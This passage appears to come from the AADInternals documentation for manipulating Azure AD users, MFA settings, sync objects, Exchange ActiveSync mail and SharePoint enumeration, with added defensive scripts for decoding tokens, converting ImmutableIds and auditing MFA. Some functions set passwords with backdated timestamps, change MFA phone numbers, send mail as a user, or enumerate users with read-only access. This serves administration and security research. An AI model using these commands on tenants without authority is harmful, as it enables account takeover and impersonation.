appid               : 1b730954-1685-4b74-9bfd-dac224a7b894
appidacr            : 0
family_name         : demo
given_name          : admin
ipaddr              : 127.0.0.1
name                : admin demo
oid                 : 69be7da7-e29f-4753-b8c7-0417a63a1804
puid                : 1003BFFDABE606EE
scp                 : user_impersonation
sub                 : SaN7kFxdXhzQN6B7C8ThGEg4gBIrcXo3lzcayeoReps
tenant_region_scope : EU
tid                 : 6217f557-602d-4fc8-b2f9-5cb948f6ce26
unique_name         : admin@company.onmicrosoft.com
upn                 : admin@company.onmicrosoft.com
uti                 : bH3Bzy9D5ESLcW_S0KkoAA
ver                 : 1.0
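
The one-hour lifetime mentioned under "Playing with access tokens" and the aud/iss debugging hint above can both be checked without the module. The following is an added example (not code from AADInternals): it decodes the payload of any JWT access token in PowerShell and reports audience, issuer, tenant, authentication methods and remaining lifetime. It only decodes; it does not validate the signature, so it tells you what a token claims, not whether the token is genuine. The sample token is constructed from the claim values shown in the output above (its exp is in 2018, so it is already expired) with a placeholder signature segment.

```powershell
# Added example, not part of AADInternals. Decode a JWT payload (no signature
# validation) and surface the claims that matter when debugging a token.
function ConvertFrom-JwtPayload {
    param([Parameter(Mandatory = $true)][string]$Token)

    $segments = $Token.Split('.')
    if ($segments.Count -lt 2) { throw 'Not a JWT: expected header.payload.signature' }

    # JWT segments are Base64url without padding: restore the standard alphabet and padding
    $payload = $segments[1].Replace('-', '+').Replace('_', '/')
    switch ($payload.Length % 4) {
        2 { $payload += '==' }
        3 { $payload += '=' }
    }
    $json = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload))
    return ($json | ConvertFrom-Json)
}

function Test-JwtClaims {
    param(
        [Parameter(Mandatory = $true)][string]$Token,
        [string]$ExpectedAudience = 'https://graph.windows.net'   # AAD Graph, as in the output above
    )
    $claims    = ConvertFrom-JwtPayload -Token $Token
    $expires   = [DateTimeOffset]::FromUnixTimeSeconds([int64]$claims.exp)
    $remaining = $expires - [DateTimeOffset]::UtcNow

    [pscustomobject]@{
        Audience        = $claims.aud
        AudienceMatches = ($claims.aud -eq $ExpectedAudience)
        Issuer          = $claims.iss
        TenantId        = $claims.tid
        User            = $claims.upn
        AuthMethods     = (@($claims.amr) -join ',')
        ExpiresUtc      = $expires.UtcDateTime
        MinutesLeft     = [math]::Round($remaining.TotalMinutes, 1)
        Expired         = ($remaining.TotalSeconds -le 0)
    }
}

# Helper used only to build the constructed sample below (Base64url encode)
function ConvertTo-Base64Url([string]$Text) {
    [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($Text)).TrimEnd('=').Replace('+', '-').Replace('/', '_')
}

# Constructed sample token: claim values taken from the output above, the
# signature segment is a placeholder, so this token would never validate.
$samplePayload = @{
    aud = 'https://graph.windows.net'
    iss = 'https://sts.windows.net/fe177079-66f4-4f9f-bcb6-e085b92e3c8a/'
    tid = '6217f557-602d-4fc8-b2f9-5cb948f6ce26'
    upn = 'admin@company.onmicrosoft.com'
    amr = @('pwd')
    iat = 1540478026
    exp = 1540481926
} | ConvertTo-Json -Compress
$sampleToken = (ConvertTo-Base64Url '{"typ":"JWT","alg":"RS256"}') + '.' +
               (ConvertTo-Base64Url $samplePayload) + '.placeholder-signature'

Test-JwtClaims -Token $sampleToken

# With the module installed, inspect a freshly issued cache token the same way:
# Test-JwtClaims -Token (Get-AADIntAccessTokenForAADGraph)
```

A live token from Get-AADIntAccessTokenForAADGraph shows MinutesLeft counting down from about sixty, which is why a script that runs longer than that has to call the token function again. An AudienceMatches of False with an otherwise valid token is the usual cause of a 401 from a Graph call: the token was issued for a different API.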

Get-AADIntCertificate (*)

This function loads a certificate from a .pfx file into a variable. Used to create SAML tokens.

Example:

# Load the certificate from a .pfx file
$cert = Get-AADIntCertificate -FileName 'C:\temp\cert.pfx' -Password 'mypassword'

Output:

Thumbprint                                Subject
----------                                -------
7fb507489addeee4dff2f64c68d1970c28b0da62  CN=sign.company.com, O=Company, S=Alaska, C=US

Get-AADIntImmutableID (*)

This function returns the ImmutableId for the given ADUser object. It must be run on a computer that has the ActiveDirectory module.

Example:

# Get ImmutableId for an ADUser (the ADUser object is passed with -ADUser)
$user=Get-ADUser "myuser"
$immutableId=Get-AADIntImmutableID -ADUser $user
$immutableId

Output:

Zjk1OGUxZTctNDE4ZS00Njk5LTg1ZjgtN2YyNGM2NTcwNW==
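
Azure AD’s ImmutableId for a synchronised user is the Base64 encoding of the 16 bytes of the on-premises source anchor (the objectGUID, or ms-DS-ConsistencyGuid once Azure AD Connect has copied the objectGUID into it). The following is an added example (not code from AADInternals) that converts in both directions, so that during an investigation a cloud object can be mapped back to its on-premises account on a machine without the ActiveDirectory module. The sample value is the 24-character ImmutableId shown for LeeG@company.com in the Get-AADIntUsers output below; the assumption that the anchor is GUID-based is stated in the code.

```powershell
# Added example, not part of AADInternals. Convert between an AD objectGUID and
# the Azure AD ImmutableId (Base64 of the GUID's 16 bytes). Assumes the source
# anchor is objectGUID / ms-DS-ConsistencyGuid, the Azure AD Connect default.
function ConvertTo-ImmutableId {
    param([Parameter(Mandatory = $true)][guid]$ObjectGuid)
    [Convert]::ToBase64String($ObjectGuid.ToByteArray())
}

function ConvertFrom-ImmutableId {
    param([Parameter(Mandatory = $true)][string]$ImmutableId)
    $bytes = [Convert]::FromBase64String($ImmutableId)
    # A GUID-based anchor is always 16 bytes; anything else was not derived from objectGUID
    if ($bytes.Length -ne 16) {
        throw "ImmutableId decodes to $($bytes.Length) bytes, not a GUID-based anchor"
    }
    [guid]::new($bytes)
}

# Sample value taken from the Get-AADIntUsers output on this page (LeeG@company.com)
$sampleImmutableId = '7jYndBUFCEqlXQNZEO3uwQ=='
$guid      = ConvertFrom-ImmutableId -ImmutableId $sampleImmutableId
$roundTrip = ConvertTo-ImmutableId -ObjectGuid $guid

[pscustomobject]@{
    ImmutableId = $sampleImmutableId
    ObjectGuid  = $guid
    RoundTrip   = $roundTrip
    Consistent  = ($roundTrip -eq $sampleImmutableId)
}

# With the ActiveDirectory module available, the same conversion from the AD side:
# Get-ADUser myuser | ForEach-Object { ConvertTo-ImmutableId -ObjectGuid $_.ObjectGUID }
```

The decoded GUID can be looked up directly with Get-ADUser -Identity &lt;guid&gt; or in a domain controller’s event logs, which is faster than matching on UPNs that may have been rewritten during synchronisation. Deliberately mismatched ImmutableIds are also how accounts get soft-matched to unexpected on-premises objects, so a cloud account whose ImmutableId does not decode to 16 bytes, or decodes to a GUID that does not exist on-premises, deserves a second look.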

User manipulation

User manipulation functions provide the basic user adding/editing/deleting functionality and some extras.

Get-AADIntUsers (A)

This function returns users of the tenant.

Example:

# Get users
Get-AADIntUsers | Select UserPrincipalName,ObjectId,ImmutableId

Output:

UserPrincipalName                                               ObjectId                             ImmutableId             
-----------------                                               --------                             -----------  
LeeG@company.com                                                2eee0a36-9e2f-4985-80e1-4172ed8b3213 7jYndBUFCEqlXQNZEO3uwQ==
LidiaH@company.com                                              34289155-2798-432d-9398-53e7e0918f38 W3clIieLs0ivUeoY1lu1fg==
AllanD@company.com                                              3a0eea57-9f74-4ee5-8e84-353c35581cc2 BzPotuy3G0ySBJN5tZwB4w==

Get-AADIntUser (A)

This function returns information for the given user.

Example:

# Get user information
Get-AADIntUser -UserPrincipalName "LeeG@company.com"

Output:

AlternateEmailAddresses                : 
AlternateMobilePhones                  : 
AlternativeSecurityIds                 : 
BlockCredential                        : false
City                                   : 
CloudExchangeRecipientDisplayType      : 1073741824
Country                                : 
Department                             : Manufacturing
DirSyncProvisioningErrors              : 
DisplayName                            : Lee Gu
Errors                                 : 
Fax                                    : 
FirstName                              : Lee
ImmutableId                            : 7jYndBUFCEqlXQNZEO3uwQ==
IndirectLicenseErrors                  : 
IsBlackberryUser                       : false
IsLicensed                             : true
LastDirSyncTime                        : 2018-06-26T11:04:16Z
LastName                               : Gu
LastPasswordChangeTimestamp            : 2017-10-03T04:44:43Z
LicenseAssignmentDetails               : LicenseAssignmentDetails
LicenseReconciliationNeeded            : false
Licenses                               : Licenses
LiveId                                 : 1003BFFDABE61DB7
MSExchRecipientTypeDetails             : 
MSRtcSipDeploymentLocator              : 
MSRtcSipPrimaryUserAddress             : 
MobilePhone                            : 
OathTokenMetadata                      : 
ObjectId                               : 2eee0a36-9e2f-4985-80e1-4172ed8b3213
Office                                 : 23/3101
OverallProvisioningStatus              : PendingInput
PasswordNeverExpires                   : true
PasswordResetNotRequiredDuringActivate : true
PhoneNumber                            : +1 913 555 0101
PortalSettings                         : 
PostalCode                             : 66210
PreferredDataLocation                  : 
PreferredLanguage                      : 
ProxyAddresses                         : ProxyAddresses
ReleaseTrack                           : 
ServiceInformation                     : 
SignInName                             : LeeG@company.com
SoftDeletionTimestamp                  : 
State                                  : KS
StreetAddress                          : 10801 Mastin Blvd., Suite 620
StrongAuthenticationMethods            : 
StrongAuthenticationPhoneAppDetails    : 
StrongAuthenticationProofupTime        : 
StrongAuthenticationRequirements       : 
StrongAuthenticationUserDetails        : 
StrongPasswordRequired                 : true
StsRefreshTokensValidFrom              : 2017-10-03T04:44:43Z
Title                                  : Director
UsageLocation                          : FI
UserLandingPageIdentifierForO365Shell  : 
UserPrincipalName                      : LeeG@company.com
UserThemeIdentifierForO365Shell        : 
UserType                               : Member
ValidationStatus                       : Healthy
WhenCreated                            : 2018-06-26T11:04:14Z

New-AADIntUser (A)

This function creates a new user. Currently supports only UserPrincipalName and DisplayName.

Example:

# Create a new user
New-AADIntUser -UserPrincipalName "user@company.com" -DisplayName "New User"

Output:

AlternateEmailAddresses                : 
AlternateMobilePhones                  : 
AlternativeSecurityIds                 : 
BlockCredential                        : false
City                                   : 
CloudExchangeRecipientDisplayType      : 
Country                                : 
Department                             : 
DirSyncProvisioningErrors              : 
DisplayName                            : New User
Errors                                 : 
Fax                                    : 
FirstName                              : 
ImmutableId                            : 
IndirectLicenseErrors                  : 
IsBlackberryUser                       : false
IsLicensed                             : false
LastDirSyncTime                        : 
LastName                               : 
LastPasswordChangeTimestamp            : 2018-10-25T15:13:10.8686574Z
LicenseAssignmentDetails               : 
LicenseReconciliationNeeded            : false
Licenses                               : 
LiveId                                 : 1003BFFDAEE167C0
MSExchRecipientTypeDetails             : 
MSRtcSipDeploymentLocator              : 
MSRtcSipPrimaryUserAddress             : 
MobilePhone                            : 
OathTokenMetadata                      : 
ObjectId                               : 13e121db-4132-43c8-a784-a9b12f2bd4e3
Office                                 : 
OverallProvisioningStatus              : None
PasswordNeverExpires                   : false
PasswordResetNotRequiredDuringActivate : 
PhoneNumber                            : 
PortalSettings                         : 
PostalCode                             : 
PreferredDataLocation                  : 
PreferredLanguage                      : 
ProxyAddresses                         : 
ReleaseTrack                           : 
ServiceInformation                     : 
SignInName                             : new.user@company.com
SoftDeletionTimestamp                  : 
State                                  : 
StreetAddress                          : 
StrongAuthenticationMethods            : 
StrongAuthenticationPhoneAppDetails    : 
StrongAuthenticationProofupTime        : 
StrongAuthenticationRequirements       : 
StrongAuthenticationUserDetails        : 
StrongPasswordRequired                 : true
StsRefreshTokensValidFrom              : 2018-10-25T15:13:10.8686574Z
Title                                  : 
UsageLocation                          : 
UserLandingPageIdentifierForO365Shell  : 
UserPrincipalName                      : new.user@company.com
UserThemeIdentifierForO365Shell        : 
UserType                               : Member
ValidationStatus                       : Healthy
WhenCreated                            : 
Password                               : Tog59451

Set-AADIntUser (A)

This function changes user’s information.

Example:

# Set user information
Set-AADIntUser -UserPrincipalName "user@company.com" -FirstName "Dave"

Remove-AADIntUser (A)

This function removes a user.

Example:

# Remove the user
Remove-AADIntUser -UserPrincipalName "user@company.com"

Get-AADIntGlobalAdmins (A)

This function returns all Global Admins of the tenant.

Example:

# Get global admins
Get-AADIntGlobalAdmins

Output:

DisplayName    UserPrincipalName                 
-----------    -----------------                 
admin demo     admin@company.onmicrosoft.com
Dave the Admin dave@company.com            

Get-AADIntUserMFA (A)

Since version 0.2.8
Gets user’s MFA settings

Example:

# Get the access token
$at=Get-AADIntAccessTokenForAADGraph
    
# Get user's MFA settings 
Get-AADIntUserMFA -AccessToken $at -UserPrincipalName user@company.com

Output:

UserPrincipalName      : user@company.com
State                  : Enforced
PhoneNumber            : +1 123456789
AlternativePhoneNumber : +358 123456789
Email                  : someone@hotmail.com
DefaultMethod          : OneWaySMS
Pin                    : 
OldPin                 : 
StartTime              :          

Set-AADIntUserMFA (A)

Since version 0.2.8
Sets user’s MFA settings

Example:

# Get the access token
$at=Get-AADIntAccessTokenForAADGraph
    
# Set user's MFA settings 
Set-AADIntUserMFA -AccessToken $at  -UserPrincipalName user@company.com -PhoneNumber "+1 123456789" -DefaultMethod PhoneAppNotification
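The settings Get-AADIntUserMFA and Set-AADIntUserMFA read and write (state, phone number, default method) are the ones a tenant admin should be reviewing regularly. The following audit script is an added example and not part of AADInternals; it uses the MSOnline module (assumed installed, with Connect-MsolService already run) and its StrongAuthentication* user properties, and the function name ending in "Example" is this example's own.

```powershell
# Added example, not part of AADInternals: audit per-user MFA state and default method with
# the MSOnline module, so changes of the kind Set-AADIntUserMFA makes can be reviewed.
# Assumes MSOnline is installed and Connect-MsolService has been run.

function Get-MfaAuditExample {
    param(
        # Phone-based methods; treated as weak relative to PhoneAppNotification/PhoneAppOTP
        [string[]]$WeakMethods = @('OneWaySMS', 'TwoWayVoiceMobile')
    )
    Get-MsolUser -All | ForEach-Object {
        $user = $_
        # StrongAuthenticationRequirements is empty when per-user MFA is disabled. That does
        # not mean the user never does MFA: Conditional Access or Security Defaults may still
        # require it, so treat "Disabled" as "check the policy", not as "no MFA".
        $state = 'Disabled'
        if ($user.StrongAuthenticationRequirements.Count -gt 0) {
            $state = $user.StrongAuthenticationRequirements[0].State
        }
        $defaultMethod = ($user.StrongAuthenticationMethods | Where-Object { $_.IsDefault }).MethodType
        $phone         = $user.StrongAuthenticationUserDetails.PhoneNumber

        $finding = ''
        if ($state -eq 'Disabled')               { $finding = 'NoPerUserMfa' }
        elseif ($defaultMethod -in $WeakMethods) { $finding = 'WeakDefaultMethod' }
        elseif (-not $defaultMethod)             { $finding = 'NoDefaultMethod' }

        [pscustomobject]@{
            UserPrincipalName = $user.UserPrincipalName
            State             = $state
            DefaultMethod     = $defaultMethod
            PhoneNumber       = $phone
            Finding           = $finding
        }
    }
}

# Show only users that need attention. PhoneNumber is reported so it can be compared against
# HR or IdP records: a changed registration number is the one thing this list cannot judge alone.
Get-MfaAuditExample | Where-Object { $_.Finding } | Sort-Object UserPrincipalName | Format-Table -AutoSize
```

The DefaultMethod values (OneWaySMS, PhoneAppNotification, ...) are the same MethodType strings the AADInternals functions above use, so the output of this audit and of Get-AADIntUserMFA can be compared directly.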

User manipulation with AD sync api

These functions allow manipulation of Azure AD objects in ways that are otherwise impossible.

NOTE! These functions use the Azure AD synchronization API and may cause severe harm to the tenant! USE AT YOUR OWN RISK!

Get-AADIntSyncObjects (A)

This function returns all Azure AD objects that are not synced to the on-premises AD.

Example:

# Get synchronisable objects from AAD
Get-AADIntSyncObjects | Select UserPrincipalName

Output:

UserPrincipalName          
-----------------          
BrianJ@company.com            
LynneR@company.com                        
MiriamG@company.com                       
AllanD@company.com                        
IsaiahL@company.com               

Set-AADIntAzureADObject (A)

This function creates a new or modifies an existing Azure AD object.

Allows setting all Azure AD attributes. The sourceAnchor attribute is the most important one and is automatically set only for synced users. This is typically the ImmutableID (Base64 encoded on-prem AD object’s GUID), but can be any string that is unique tenant wide.

Example:

# Create a new user ("COMPANY" is a placeholder for the on-prem domain's NetBIOS name)
Set-AADIntAzureADObject -userPrincipalName "someone@company.com" -sourceAnchor "ABC" -netBiosName "COMPANY"

Output:

CloudAnchor            : User_d14f7322-c997-4e87-912b-f43c906cec81
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : ABC
SyncOperation          : Add
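Get-AADIntImmutableID and the sourceAnchor discussion above both rest on the same encoding: the default sourceAnchor is the Base64 form of the on-prem objectGUID. The block below is an added example, not code from AADInternals, that converts in both directions and classifies anchors found in the tenant. Function names ending in "Example" are this example's own; the GUID used for the round trip is the one the ImmutableId 7jYndBUFCEqlXQNZEO3uwQ== from the Get-AADIntUsers output above decodes to.

```powershell
# Added example, not part of AADInternals: convert between an on-prem AD objectGUID and the
# Base64 ImmutableId/sourceAnchor form, and sanity-check anchors before using them with the
# sync functions. Function names ending in "Example" are this example's own.

function ConvertTo-ImmutableIdExample {
    param([Parameter(Mandatory)][guid]$ObjectGuid)
    # AAD Connect's default sourceAnchor is the Base64 encoding of the 16 raw bytes of
    # objectGUID (.NET byte order), which always gives a 24-character string ending in "=="
    [Convert]::ToBase64String($ObjectGuid.ToByteArray())
}

function ConvertFrom-ImmutableIdExample {
    param([Parameter(Mandatory)][string]$ImmutableId)
    $bytes = [Convert]::FromBase64String($ImmutableId)
    if ($bytes.Length -ne 16) {
        throw "'$ImmutableId' decodes to $($bytes.Length) bytes, not a 16-byte GUID"
    }
    [guid]::new($bytes)
}

function Test-SourceAnchorExample {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$Anchor)
    process {
        # The sync API accepts any tenant-wide unique string, so a free-form anchor such as
        # "ABC" is valid but unusual; flag it so a review of synced objects can spot it
        $guid = $null
        try { $guid = ConvertFrom-ImmutableIdExample -ImmutableId $Anchor } catch { }
        [pscustomobject]@{
            Anchor     = $Anchor
            GuidBased  = ($null -ne $guid)
            ObjectGuid = $guid
        }
    }
}

# Round trip: this objectGUID is the one the ImmutableId in the Get-AADIntUsers output encodes
$guid   = [guid]'742736ee-0515-4a08-a55d-035910edeec1'
$anchor = ConvertTo-ImmutableIdExample -ObjectGuid $guid
if ((ConvertFrom-ImmutableIdExample -ImmutableId $anchor) -ne $guid) { throw 'round trip failed' }

# Classify a GUID-based anchor and a free-form one
'7jYndBUFCEqlXQNZEO3uwQ==', 'ABC' | Test-SourceAnchorExample | Format-Table -AutoSize
```

A tenant whose sourceAnchor is configured as something other than objectGUID (for example ms-DS-ConsistencyGuid still yields GUID bytes, but a custom attribute may not) will legitimately produce anchors the GuidBased column marks as False, so read that column against your own Azure AD Connect configuration.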

Remove-AADIntAzureADObject (A)

This function removes an AAD object.

Example:

# Remove AAD object
Remove-AADIntAzureADObject -sourceAnchor ABC

Output:

CloudAnchor            : User_d14f7322-c997-4e87-912b-f43c906cec81
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : ABC
SyncOperation          : Add

Set-AADIntUserPassword (A)

This function sets the user’s password. The last password change time can also be set; it must be before the current time.

Example:

# Set the password and the change date to 1/1/1970
Set-AADIntUserPassword -SourceAnchor qIMPTm2Q3kimHgg4KQyveA== -Password "a" -ChangeDate 1/1/1970

Output: (Result 0 = success)

CloudAnchor Result SourceAnchor            
----------- ------ ------------            
CloudAnchor 0      qIMPTm2Q3kimHgg4KQyveA==

Reset-AADIntServiceAccount (A)

This function creates a new service account (or resets the password of an existing one). The created user will have the DirectorySynchronizationAccount role.

Azure AD Connect uses this during the configuration stage to create the service account and stores the username and password to the configuration database.

Example:

# Create a new service account for AD sync
Reset-AADIntServiceAccount -ServiceAccount Sync_MyServer_nnnnnnn

Output:

Password         UserName                                          
--------         --------                                          
5(]lCy=Q{.#@lb}p Sync_MyServer_nnnnnnn@company.onmicrosoft.com

Exchange Online functions

Exchange Online functions are used to manipulate devices and send mail using ActiveSync and Outlook APIs. Functions marked with E use an Exchange Online access token.

Get-AADIntEASAutoDiscover (*)

Since version 0.1.6
Returns endpoints for the given protocol for the given email address. If the email address is invalid (i.e. the user does not exist) this takes ages.

Example:

# Get endpoint for EWS api
Get-AADIntEASAutoDiscover -Email "some.user@company.com" -Protocol Ews

Output:

Protocol  Url                         
--------  ---                         
Substrate https://substrate.office.com

Get-AADIntEASAutoDiscoverV1 (E)

Since version 0.1.6
Returns ActiveSync endpoint for the given user (credentials or access token).

Example:

# Get credentials
$Cred=Get-Credential
# Get endpoint for ActiveSync
Get-AADIntEASAutoDiscoverV1 -Credentials $Cred

Output:

https://outlook.office365.com/Microsoft-Server-ActiveSync

Set-AADIntEASSettings (E)

Since version 0.1.6
Adds a new or modifies an existing ActiveSync device for the given user (credentials or access token). The added or modified device can be used to send emails with Send-AADIntEASMessage.

Example:

# Get credentials
$Cred=Get-Credential
# Create a device
Set-AADIntEASSettings -Credentials $Cred -DeviceId android01234 -DeviceType Android -Model "Android 01234" -PhoneNumber "+1234567890"

Output:

<Settings xmlns="Settings"><Status>1</Status><DeviceInformation><Status>1</Status></DeviceInformation></Settings>

Get-AADIntMobileDevices (E)

Since version 0.1.6
Gets mobile devices from Exchange Online. Devices can be used to send emails with Send-AADIntEASMessage.

Example:

# Get credentials
$Cred=Get-Credential
# Get Mobile Devices
Get-AADIntMobileDevices -Credentials $Cred | select DeviceId,DeviceType,ClientType,UserDisplayname

Output:

DeviceId     DeviceType                 ClientType UserDisplayName                                                 
--------     ----------                 ---------- ---------------                                                 
430847304    TestActiveSyncConnectivity EAS        EURP189A002.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizat
android01234 Android                    EAS        EURP189A002.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizat

Send-AADIntEASMessage (E)

Since version 0.1.6
Sends an email from the given user via ActiveSync using the given device.

Example:

# Get credentials
$Cred=Get-Credential
# Send an email
Send-AADIntEASMessage -Credentials $Cred -DeviceId android01234 -DeviceType Android -Recipient "someone@company.com" -Subject "An email" -Message "<h2>This is a message!</h2>"

Output:

WARNING: Message was not Base64 encoded, converting..

Send-AADIntOutlookMessage (E)

Since version 0.1.6
Sends an email from the given user via Outlook API.

Example:

# Get accesstoken
$At=Get-AADIntAccessTokenForEXO
# Send the email
Send-AADIntOutlookMessage -AccessToken $At -Recipient "someone@company.com" -Subject "An email" -Message "<h2>This is a message!</h2>"

SharePoint Online functions

SharePoint Online functions are used to retrieve information about users and groups of SharePoint sites.

Get-AADIntSPOSiteUsers (S)

Since version 0.2.4
Returns users of the given site. Only visitor (read-access) is needed :)

Example:

# Get site users
$ah=Get-AADIntSPOAuthenticationHeader -Site https://company.sharepoint.com
Get-AADIntSPOSiteUsers -Site https://company.sharepoint.com -AuthHeader $ah

Output:

IsSiteAdmin                    : True
Id                             : 17
LoginName                      : c:0t.c|tenant|a200e3ee-47d0-4b9b-99c6-554b85823042
PrincipalType                  : 4
IsEmailAuthenticationGuestUser : False
UserPrincipalName              : 
IsShareByEmailGuestUser        : False
IsHiddenInUI                   : False
NameId                         : 
NameIdIssuer                   : 
Title                          : SharePoint Service Administrator
Email                          : 

IsSiteAdmin                    : False
Id                             : 1073741823
LoginName                      : SHAREPOINT\system
PrincipalType                  : 1
IsEmailAuthenticationGuestUser : False
UserPrincipalName              : 
IsShareByEmailGuestUser        : False
IsHiddenInUI                   : False
NameId                         : S-1-0-0
NameIdIssuer                   : urn:office:idp:activedirectory
Title                          : System Account
Email                          : 

IsSiteAdmin                    : False
Id                             : 23
LoginName                      : i:0#.f|membership|user@company.com
PrincipalType                  : 1
IsEmailAuthenticationGuestUser : False
UserPrincipalName              : user@company.com
IsShareByEmailGuestUser        : False
IsHiddenInUI                   : False
NameId                         : 10030000b5466d52
NameIdIssuer                   : urn:federation:microsoftonline
Title                          : user
Email                          : user@company.com

Get-AADIntSPOUserProperties (S)

Since version 0.2.4
Returns detailed information of the given user. Only visitor (read-access) is needed :)

Note: the user’s name must be in SharePoint “LoginName” format as above.

Example:

# Get site users
$ah=Get-AADIntSPOAuthenticationHeader -Site https://company.sharepoint.com
Get-AADIntSPOUserProperties -Site https://company.sharepoint.com -AuthHeader $ah -User "i:0#.f|membership|user@company.com"

Output:

Updated                            : 2019-08-16T07:59:30Z
Author                             : 
AccountName                        : i:0#.f|membership|user@company.com
DirectReports                      : 
DisplayName                        : user
Email                              : user@company.com
ExtendedManagers                   : 
ExtendedReports                    : i:0#.f|membership|user@company.com
IsFollowed                         : False
Peers                              : 
PersonalUrl                        : https://company-my.sharepoint.com/personal/user_company_com/
PictureURL                         : 
UserUrl                            : https://company-my.sharepoint.com:443/Person.aspx?accountname=i:0#.f|membership|user@company.com
Title                              : 
UserProfile_GUID                   : f6b3014d-c4d7-4775-a37c-1e6f14fa98f9
SID                                : i:0h.f|membership|10030000a5566b50@live.com
ADGuid                             : System.Byte[]
FirstName                          : 
SPS-PhoneticFirstName              : 
LastName                           : 
SPS-PhoneticLastName               : 
PreferredName                      : user
SPS-PhoneticDisplayName            : 
WorkPhone                          : 
Department                         : 
SPS-Department                     : 
Manager                            : 
AboutMe                            : 
PersonalSpace                      : /personal/user_company_com/
UserName                           : user@company.com
QuickLinks                         : 
WebSite                            : 
PublicSiteRedirect                 : 
SPS-JobTitle                       : 
SPS-Dotted-line                    : 
SPS-Peers                          : 
SPS-Responsibility                 : 
SPS-SipAddress                     : user@company.com
SPS-MySiteUpgrade                  : 
SPS-ProxyAddresses                 : 
SPS-HireDate                       : 
SPS-DisplayOrder                   : 
SPS-ClaimID                        : user@company.com
SPS-ClaimProviderID                : membership
SPS-ResourceSID                    : 
SPS-ResourceAccountName            : 
SPS-MasterAccountName              : 
SPS-UserPrincipalName              : user@company.com
SPS-O15FirstRunExperience          : 
SPS-PersonalSiteInstantiationState : 2
SPS-DistinguishedName              : CN=abf7eff8-59a5-456f-a723-976f07b14420,OU=a200e3ee-47d0-4b9b-99c6-554b85823042,OU=Tenants,OU=MSOnline,DC=SPODS44818354,DC=msoprd,DC=msft,DC=net
SPS-SourceObjectDN                 : 
SPS-ClaimProviderType              : Forms
SPS-SavedAccountName               : SPODS44833354\$JUHIC0-TJJO02Q7PVM2
SPS-SavedSID                       : System.Byte[]
SPS-ObjectExists                   : 
SPS-PersonalSiteCapabilities       : 4
SPS-PersonalSiteFirstCreationTime  : 10/2/2017 5:50:10 PM
SPS-PersonalSiteLastCreationTime   : 10/2/2017 5:50:10 PM
SPS-PersonalSiteNumberOfRetries    : 1
SPS-PersonalSiteFirstCreationError : 
SPS-FeedIdentifier                 : 
WorkEmail                          : user@company.com
CellPhone                          : 
Fax                                : 
HomePhone                          : 
Office                             : 
SPS-Location                       : 
Assistant                          : 
SPS-PastProjects                   : 
SPS-Skills                         : 
SPS-School                         : 
SPS-Birthday                       : 
SPS-StatusNotes                    : 
SPS-Interests                      : 
SPS-HashTags                       : 
SPS-EmailOptin                     : 
SPS-PrivacyPeople                  : True
SPS-PrivacyActivity                : 4095
SPS-PictureTimestamp               : 
SPS-PicturePlaceholderState        : 
SPS-PictureExchangeSyncState       : 
SPS-TimeZone                       : 
OfficeGraphEnabled                 : 
SPS-UserType                       : 0
SPS-HideFromAddressLists           : False
SPS-RecipientTypeDetails           : 
DelveFlags                         : 
msOnline-ObjectId                  : abf7eff8-59a5-456f-a723-976f07b14420
SPS-PointPublishingUrl             : 
SPS-TenantInstanceId               : 
SPS-SharePointHomeExperienceState  : 
SPS-MultiGeoFlags                  : 
PreferredDataLocation              : 

Get-AADIntSPOSiteGroups (S)

Since version 0.2.4
Returns groups of the given site. Only visitor (read-access) is needed :)

Example:

# Get site groups
$ah=Get-AADIntSPOAuthenticationHeader -Site https://company.sharepoint.com
Get-AADIntSPOSiteGroups -Site https://company.sharepoint.com -AuthHeader $ah

Output:

AllowRequestToJoinLeave        : False
Id                             : 3
LoginName                      : Excel Services Viewers
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : Excel Services Viewers
OwnerTitle                     : System Account

AllowRequestToJoinLeave        : False
Id                             : 19
LoginName                      : SharePointHome OrgLinks Admins
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : SharePointHome OrgLinks Admins
OwnerTitle                     : SharePointHome OrgLinks Admins

AllowRequestToJoinLeave        : False
Id                             : 20
LoginName                      : SharePointHome OrgLinks Editors
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : SharePointHome OrgLinks Editors
OwnerTitle                     : SharePointHome OrgLinks Editors

AllowRequestToJoinLeave        : False
Id                             : 21
LoginName                      : SharePointHome OrgLinks Viewers
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : SharePointHome OrgLinks Viewers
OwnerTitle                     : SharePointHome OrgLinks Admins

AllowRequestToJoinLeave        : False
Id                             : 9
LoginName                      : Team Site Members
AllowMembersEditMembership     : True
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : False
IsHiddenInUI                   : False
Description                    : 
Title                          : Team Site Members
OwnerTitle                     : Team Site Owners

AllowRequestToJoinLeave        : False
Id                             : 7
LoginName                      : Team Site Owners
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : False
IsHiddenInUI                   : False
Description                    : 
Title                          : Team Site Owners
OwnerTitle                     : Team Site Owners

AllowRequestToJoinLeave        : False
Id                             : 8
LoginName                      : Team Site Visitors
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : False
IsHiddenInUI                   : False
Description                    : 
Title                          : Team Site Visitors
OwnerTitle                     : Team Site Owners

OneDrive for Business functions

OneDrive functions are used to download, send, and modify files using OneDrive for Business APIs.

